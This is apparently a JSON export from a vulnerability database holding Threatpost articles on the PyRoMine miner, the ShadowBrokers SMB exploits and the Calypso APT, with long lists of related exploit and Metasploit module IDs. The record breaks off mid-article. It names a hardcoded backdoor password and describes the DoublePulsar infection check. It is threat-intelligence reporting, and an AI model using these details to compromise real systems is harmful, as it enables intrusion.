{"score": {"value": 9.3, "vector": "NONE", "modified": "2018-10-06T22:52:29"}}, "objectVersion": "1.4"}, "lastseen": "2018-10-06T22:52:29", "differentElements": ["modified"], "edition": 1}, {"bulletin": {"id": "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "hash": "82d1a2b6dbff80a70da17354407118ec", "type": "threatpost", "bulletinFamily": "info", "title": "PyRoMine Uses NSA Exploit for Monero Mining and Backdoors", "description": "The 
ShadowBrokers\u2019 release of a trove of National Security Agency exploits last year appears to be the gift that keeps on giving, to the hacker community at least: A fresh malware that uses the EternalRomance tool has hit the scene, with Monero-mining as the stated goal. However, more damaging follow-on attacks are likely the endgame.\n\nThe bad code is a Python-based cryptocurrency mining malware, according to Fortinet\u2019s FortiGuard Labs, which first [discovered it](<https://www.fortinet.com/blog/threat-research/python-based-malware-uses-nsa-exploit-to-propagate-monero--xmr--.html>) this month. Because the malware uses the EternalRomance exploit, the researchers have given it the snappy name of \u201cPyRoMine.\u201d\n\nThe malware can be downloaded as an executable file compiled with PyInstaller, which is a program that packages code written in Python into stand-alone executables. This means that, conveniently, there is no need to install Python on the machine in order to execute the Python-based PyRoMine. Once installed, it sets about silently stealing CPU resources from unwitting victims to aim its proverbial drill bit at uncovering Monero profits.\n\n\u201cWe don\u2019t know for sure how it arrives on a system, but considering that this is the type of malware that needs to be mass distributed, it is safe to assume that it arrives via spam email or drive-by-download,\u201d FortiGuard security researcher Jasper Manuel said in an email interview.\n\nWorryingly, PyRoMine also sets up a hidden default account on the victimized machine with system administrator privileges, using the password \u201cP@ssw0rdf0rme.\u201d It\u2019s likely that this would be used for re-infection and further attacks, according to Manuel.\n\n\u201cIt is fairly likely that future attacks could happen,\u201d he told Threatpost. 
\u201cAlthough this malware is not a botnet because it doesn\u2019t phone home to report an infection and doesn\u2019t wait for commands, it still sets up an account on the affected machine and enables Remote Desktop Protocol. The attackers could use the same channel to connect to the machine using the created account to do further attacks.\u201d\n\n**Ripe for Spreading**\n\nBased on the earnings that PyRoMine has so to date (only about $650), it hasn\u2019t exactly lived up to its name and caught fire on the propagation front. But that could rapidly change: For one, the choice of Monero indicates that the criminals are looking to cast a wide net, given that the currency offers an important \u201cfeature\u201d that make it more suitable to the mass market than the more venerable Bitcoin: It relies on a proof-of-work algorithm called CryptoNight, designed for ordinary computers and even mobile phones, rather than for high-end GPUs or the specialized hardware needed for efficient Bitcoin mining. Thus, the potential attack surface consists of consumers and businesses alike, globally.\n\nSecondly, cybercriminals have discovered that enterprises and individuals have been pretty slow when it comes to patching the known vulnerabilities that the NSA tools leverage.\n\nThe ShadowBrokers [leaked a whole treasure chest](<https://threatpost.com/shadowbrokers-put-price-on-monthly-zero-day-leaks/125960/>) of hacking tools and zero-day exploits in 2017, attributed to the Equation Group, which is believed to be an arm of the NSA\u2019s Tailored Access Operations unit. They target Windows XP/Vista/8.1/7/10 and Windows Server 2003/2008/2012/2016, taking advantage of a pair of vulnerabilities, CVE-2017-0144 and CVE-2017-0145. 
Microsoft [patched these very quickly](<https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010>) after the tools were made public.\n\n\u201cThe patch for EternalRomance was released a year ago, but many still don\u2019t think proactive about security,\u201d Manuel told Threatpost. \u201cThe fact that cybercriminals use these exploits tells us that they still profit by using these exploits in their malware.\u201d\n\nAnd finally, EternalRomance is a remote code execution (RCE) exploit that abuses the legacy SMBv1 file-sharing protocol. SMBv1 is typically used only within the local area network of a business, but all too often it\u2019s left exposed to the internet \u2013one of the contributing factors as to why the EternalX attacks WannaCry and NotPetya [were able to spread so widely](<https://threatpost.com/complex-petya-like-ransomware-outbreak-worse-than-wannacry/126561/>).\n\n\u201cIn the past, we have seen that these exploits were used by state-sponsored threat actors,\u201d Manuel told us. \u201cWithin days of the release, we started seeing these exploits being used by commodity malware like cryptominers and info-stealers to target general victims.\u201d\n\nPyRoMine isn\u2019t the first miner to use the NSA tools: Researchers have discovered malware authors using the EternalBlue exploit in other cryptocurrency mining malware, such as [Adylkuzz](<https://threatpost.com/cryptocurrency-mining-malware-hosted-in-amazon-s3-bucket/127643/>), [Smominru](<https://threatpost.com/massive-smominru-cryptocurrency-botnet-rakes-in-millions/129726/>) and [WannaMine](<https://threatpost.com/cryptomining-gold-rush-one-gang-rakes-in-7m-over-6-months/130232/>) \u2013 with great success.\n\nManuel added that because the patch rate is clearly low for the leveraged vulnerabilities, he expects commodity malware to continue to use the NSA exploits for some time to come. 
More concerning, PyRoMine\u2019s backdoor strategy could become a hallmark going forward.\n\n\u201cI think is going to be something that we see much more of in the future as the tools that are being deployed are multi-faceted,\u201d said Chris Roberts, chief security architect at Acalvio, in an emailed comment. \u201cIn this case, it\u2019s not only mining and disabling security services. It\u2019s also adding itself into several account types, opening up RDP (3389) and basically laying the welcome mat out for future attacks. Several of the latest tool sets are coming armed with various payloads that simply have functionality to deploy attacks, harvest for data and also take advantage of lax security and processing time. And, this all comes in a nice, neat package using the simple issue that we (the human) haven\u2019t patched or don\u2019t pay attention to what we are downloading/clicking. Once again, we are the attack vector and the computer suffers.\u201d\n", "published": "2018-04-26T14:21:13", "modified": "2018-04-26T14:21:13", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/pyromine-uses-nsa-exploit-for-monero-mining-and-backdoors/131472/", "reporter": "Tara Seals", "references": ["https://www.fortinet.com/blog/threat-research/python-based-malware-uses-nsa-exploit-to-propagate-monero--xmr--.html", "https://threatpost.com/shadowbrokers-put-price-on-monthly-zero-day-leaks/125960/", "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "https://threatpost.com/complex-petya-like-ransomware-outbreak-worse-than-wannacry/126561/", "https://threatpost.com/cryptocurrency-mining-malware-hosted-in-amazon-s3-bucket/127643/", "https://threatpost.com/massive-smominru-cryptocurrency-botnet-rakes-in-millions/129726/", "https://threatpost.com/cryptomining-gold-rush-one-gang-rakes-in-7m-over-6-months/130232/"], "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], 
"lastseen": "2019-01-23T05:27:19", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE", "modified": "2019-01-23T05:27:19"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27802", "1337DAY-ID-27803"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142603", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", 
"SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "exploitdb", "idList": ["EDB-ID:42030", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:42031"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:EA407B51944632C248FEB495594123EA"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"]}, {"type": "securelist", "idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"]}, {"type": "fireeye", "idList": ["FIREEYE:399092589F455855881447C60B56C21A"]}], "modified": "2019-01-23T05:27:19"}}, "objectVersion": "1.4"}, "lastseen": "2019-01-23T05:27:19", "differentElements": ["modified", "published"], "edition": 2}], "viewCount": 6, "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2019-04-25T05:50:11", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96704"]}, {"type": "kitploit", "idList": 
["KITPLOIT:9146046356497464176"]}, {"type": "mmpc", "idList": ["MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:4A6B394DCAF12E05136AE087248E228C"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:EA407B51944632C248FEB495594123EA", "THN:E18080D17705880B2E7B69B8AB125EA9", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142602", "PACKETSTORM:142603", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:42030"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mscve", "idList": 
["MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:43DBD2171542112FA727093E66C885BD", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:0A9B457BE0B9439673D350C9169DE4B4", "THREATPOST:C3F0F18B19C932E9BCA4BADA69F3D863", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD", "THREATPOST:C40754E8387BCCE75482449E2A457651", "THREATPOST:1B29120EF1DBE107B55050178910AACD"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "avleonov", "idList": ["AVLEONOV:98069D08913ADA26D85B10C827D3FE97", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "fireeye", "idList": ["FIREEYE:57B0F10A16E18DC672833B1812005B76", "FIREEYE:399092589F455855881447C60B56C21A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2019-04-25T05:50:11", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.threatpost.ThreatpostBulletin", "_object_types": ["robots.models.base.Bulletin", 
"robots.models.threatpost.ThreatpostBulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "hash": "5c1d3d512af20e8289b906bebc2f12f0", "type": "threatpost", "bulletinFamily": "info", "title": "ShadowBrokers' Windows Zero-Days Already Patched", "description": "Hours after what was thought to be a damaging release of [NSA hacking tools](<https://threatpost.com/shadowbrokers-expose-nsa-access-to-swift-service-bureaus/124996/>) for Windows systems, Microsoft quelled some anxiety with a late-night statement on Friday that most of the vulnerabilities disclosed by the ShadowBrokers had already been patched.\n\nThe biggest surprise was that the most recent updates came in March in a bulletin, MS17-010, addressing six critical remote code execution vulnerabilities in Windows Server Message Block (SMB). Two of the six (CVE-2017-0146 and CVE-2017-0147) were in possession of the Equation Group and exploited in EternalBlue, EternalChampion, EternalSynergy and EternalRomance.\n\nThe March update was a highly anticipated set of patches since Microsoft\u2019s February updates were a last-minute postponement with little explanation given at the time or since for the delay. Microsoft would not comment further after publishing a blog Friday reassuring users that the alleged zero-days in the ShadowBrokers\u2019 dump had [already been fixed](<https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/>).\n\n\u201cWe\u2019ve investigated and confirmed that the exploits disclosed by the Shadow Brokers have already been addressed by previous updates to our supported products,\u201d Microsoft said in a statement. \u201cCustomers with up-to-date software are already protected.\u201d\n\nMicrosoft did not, however, acknowledge who disclosed the respective vulnerabilities, which runs contrary to the majority of bugs patched on a monthly basis. 
This has given rise to a number of theories speculating that perhaps the government had privately disclosed the bugs to Microsoft through its Vulnerabilities Equities Process (VEP), that Microsoft may have paid for the bugs through a third party or directly to the ShadowBrokers, or that Microsoft followed breadcrumbs from a [Jan. 8 dump](<https://threatpost.com/shadowbrokers-selling-windows-exploits-attack-tools/123027/>) that included the code names for some of the exploits leaked on Friday, including EternalRomance and EternalSynergy. Researcher Jacob Williams, aka [MalwareJake](<http://malwarejake.blogspot.com/2017/01/implications-of-newest-shadow-brokers.html>), said there was evidence at the time indicating the existence of a SMB zero day. Williams also shared a price list from the January dump that he said could lend some credence to the possibility of a SMB 0day.\n\n\u201cMost interesting perhaps is the fact that the exploits contain a possible SMB zero day exploit,\u201d Williams wrote. \u201cFor the price requested, one would hope it is a zero day. The price is far too high for an exploit for a known vulnerability.\u201d\n\nThe SANS Institute, meanwhile, looked at a post-exploitation communications channel called [Double Pulsar](<https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312/>), used by the EternalBlue SMB zero day. SANS said the channel uses the Transaction 2 Subcommand Extension (Trans2) feature in SMB for packet capture. From the SANS report:\n\n\u201cIn packet 13 of the pcap, the system running the exploit sends a \u201ctrans2 SESSION_SETUP\u201d request to the victim. This happens before the actual exploit is sent. The intent of this request is to check if the system is already compromised. Infected or not, the system will respond with a \u201cNot Implemented\u201d message. But as part of the message, a \u201cMultiplex ID\u201d is returned that is 65 (0x41) for normal systems and 81 (0x51) for infected systems. 
If a system is infected, then SMB can be used as a covert channel to exfiltrate data or launch remote commands.\n\nWhile the four SMB zero days are the attention-grabbers from Friday\u2019s dump of Windows tools, the remaining vulnerabilities date back to before the 2006 release of Windows Vista. Most of the patched vulnerabilities target flaws in SMB, while others are in Windows Server and Kerberos. Three will not be patched, Microsoft said.\n\n\u201cOf the three remaining exploits, \u201cEnglishmanDentist\u201d, \u201cEsteemAudit\u201d, and \u201cExplodingCan\u201d, none reproduces on supported platforms, which means that customers running Windows 7 and more recent versions of Windows or Exchange 2010 and newer versions of Exchange are not at risk,\u201d Microsoft said. \u201cCustomers still running prior versions of these products are encouraged to upgrade to a supported offering.\u201d\n\nFriday\u2019s dump also included exploits used by the NSA to target two SWIFT Service Bureaus, outsourcing services used by banks to manage access and transactions on the SWIFT network. The SWIFT-related archive is called JEEPFLEA and contains credentials and the architecture data on EastNets, the Middle East\u2019s largest SWIFT Service Bureau, researcher Matt Suiche said.\n\nSuiche explained these bank transactions are handled on an Oracle database running SWIFT software. The archive includes tools used by the NSA to take data from the Oracle installation, including a list of users and SWIFT message queries, Suiche said.\n\n\u201cIn this case, if Shadow Brokers claims are indeed verified, it seems that the NSA sought to totally capture the backbone of international financial system to have a God\u2019s eye into a SWIFT Service Bureau \u2014 and potentially the entire SWIFT network,\u201d said researcher Matt Suiche in a blog posted today explaining [his analysis](<https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195>) of the data dump. 
\u201cThis would fit within standard procedure as a covert entity entrusted with covert actions that may or may not be legal in a technical sense.\u201d\n", "published": "2017-04-17T14:06:34", "modified": "2017-04-17T18:06:34", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/", "reporter": "Michael Mimoso", "references": ["https://threatpost.com/shadowbrokers-expose-nsa-access-to-swift-service-bureaus/124996/", "https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/", "https://threatpost.com/shadowbrokers-selling-windows-exploits-attack-tools/123027/", "http://malwarejake.blogspot.com/2017/01/implications-of-newest-shadow-brokers.html", "https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312/", "https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195"], "cvelist": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-11882"], "lastseen": "2018-10-06T22:53:49", "history": [], "viewCount": 10, "enchantments": {"score": {"value": 7.6, "vector": "NONE", "modified": "2018-10-06T22:53:49", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-11882", "CVE-2017-0146", "CVE-2017-0147"]}, {"type": "attackerkb", "idList": ["AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": 
["SMNTC-96709", "SMNTC-101757", "SMNTC-96707"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "fireeye", "idList": ["FIREEYE:81A95C8CF481913A870A3CEAAA7AF394"]}, {"type": "myhack58", "idList": ["MYHACK58:62201892510", "MYHACK58:62201892253"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "saint", "idList": ["SAINT:8F97D6443E5FED252FF64CE37A74709D", "SAINT:2D677AA07C3BC24D8037E937830ACA0D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0146", "MS:CVE-2017-0147"]}, {"type": "securelist", "idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"]}, {"type": "threatpost", "idList": ["THREATPOST:6CF438E98DFFF4B4057CAFB1382A4D3C", "THREATPOST:E6DC1F407BA6CEE26FE38C95EBB10D7A", "THREATPOST:D1926084C0FE408F42D77D95C906E960", "THREATPOST:D9C08A737D3D95BFF6B07A04C9479C6D", "THREATPOST:29E9543F6EC7903A34D286C6F4391368", "THREATPOST:CDDC2C11CF6377AB44508254B9FB36DA", 
"THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:D8CDE16C2F1722831D3106563D1F1551", "THREATPOST:0425B921571C93D16403B41C928D6EE4", "THREATPOST:F19F70E263B2C3D2A16C72D12F9884FC", "THREATPOST:1109584452DBA30B86EF68E3277D4E39"]}], "modified": "2018-10-06T22:53:49", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.threatpost.ThreatpostBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.threatpost.ThreatpostBulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "hash": "02cf3e03d7cf732490d89cdc2b4a219a", "type": "threatpost", "bulletinFamily": "info", "title": "Calypso APT Emerges from the Shadows to Target Governments", "description": "A newly discovered APT group, dubbed Calypso after a custom malware RAT that it uses, has been targeting state institutions in six different countries since 2016.\n\nGovernment organizations in India (34 percent), Brazil and Kazakhstan (18 percent respectively), Russia and Thailand (12 percent respectively) and Turkey (6 percent) have all been successfully infiltrated at some point, according to analysts at Positive Technologies (PT), which first spotted the group in March.\n\nTo that point, the typical _modus operandi_ of the threat actors consists of infiltrating the network perimeter by exploiting a Windows SMB remote code-execution vulnerability ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)) or by using stolen credentials. 
Once inside the network, the group injects a backdoor RAT program \u2013 the Calypso web shell \u2013 that it uses to execute commands and upload utilities and malware (including well-known tools like [Mimikatz](<https://threatpost.com/fin6-target-ecommerce/147847/>), and the NSA hacking tools [EternalBlue and EternalRomance](<https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/>)), all in an effort to move laterally. The goal is to reach endpoints on a targeted organization\u2019s LAN and steal confidential data. The APT also uses a variety of legitimate administrative tools, which helps it stay under the radar, PT pointed out.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThese attacks succeeded largely because most of the utilities the group uses to move inside the network are widely used by the specialists everywhere for network administration,\u201d said Denis Kuvshinov, lead specialist in threat analysis at Positive Technologies, via email. \u201cThe group used publicly available utilities and exploit tools.\u201d\n\nThe Calypso RAT (it\u2019s unclear whether this is named after the Greek goddess from the Odyssey, the fruit drink, the island backbeat familiar from the music world or something else altogether) is a custom affair. It contains a dropper for first-stage infection, which then extracts further payloads in the form of a Windows batch script (BAT) for installation. The BAT file contains variables that can be invoked to have it save files, modify services and modify registry keys.\n\nPT analysis showed that the dropper next executes shellcode, which provides the interface for communicating with the command-and-control (C2) server and for downloading various modules. 
Once the C2 connection is made, the shellcode sends the C2 information about the infected computer, via TCP and SSL (such as computer name, current date, OS version, 32-bit vs. 64-bit OS and CPU, and IP addresses on network interfaces and their MAC addresses).\n\nCalypso RAT next can execute a total of 12 commands in the form of modules, each of which is self-contained and has two communication pipelines: One for transmitting data from the module to C2, and the other for receiving data from C2. Each module has a unique ID assigned by C2.\n\nAmong the commands are directions to launch three threads.\n\n\u201cOne is a heartbeat sending an empty packet to C2 every 54 seconds,\u201d explained PT, in the analysis. \u201cThe other processes and executes commands from C2. As for the third thread, we could not figure out its purpose, because the lines implementing its functionality were removed from the code. All we can tell is that this thread was supposed to \u2018wake up\u2019 every 54 seconds, just like the first one.\u201d\n\nIn some attacks, the backdoor has also fetched executables, including the FlyingDutchman malware, which includes functions such as screenshot capture, remote shell, and file system operations.\n\nAs for attribution, PT said that its forensics indicate that the discovered APT group is likely to be of Asian origin and is Chinese-speaking. The firm reached this conclusion because in some of the attacks, the hackers accidentally disclosed their real IP addresses, which belonged to Chinese providers.\n\n\u201cThe IP address belongs to China Telecom,\u201d according to a PT analysis [launched Thursday](<https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5>). \u201cWe believe the attackers could have been careless and set up the proxy server incorrectly, thus disclosing their real IP address. 
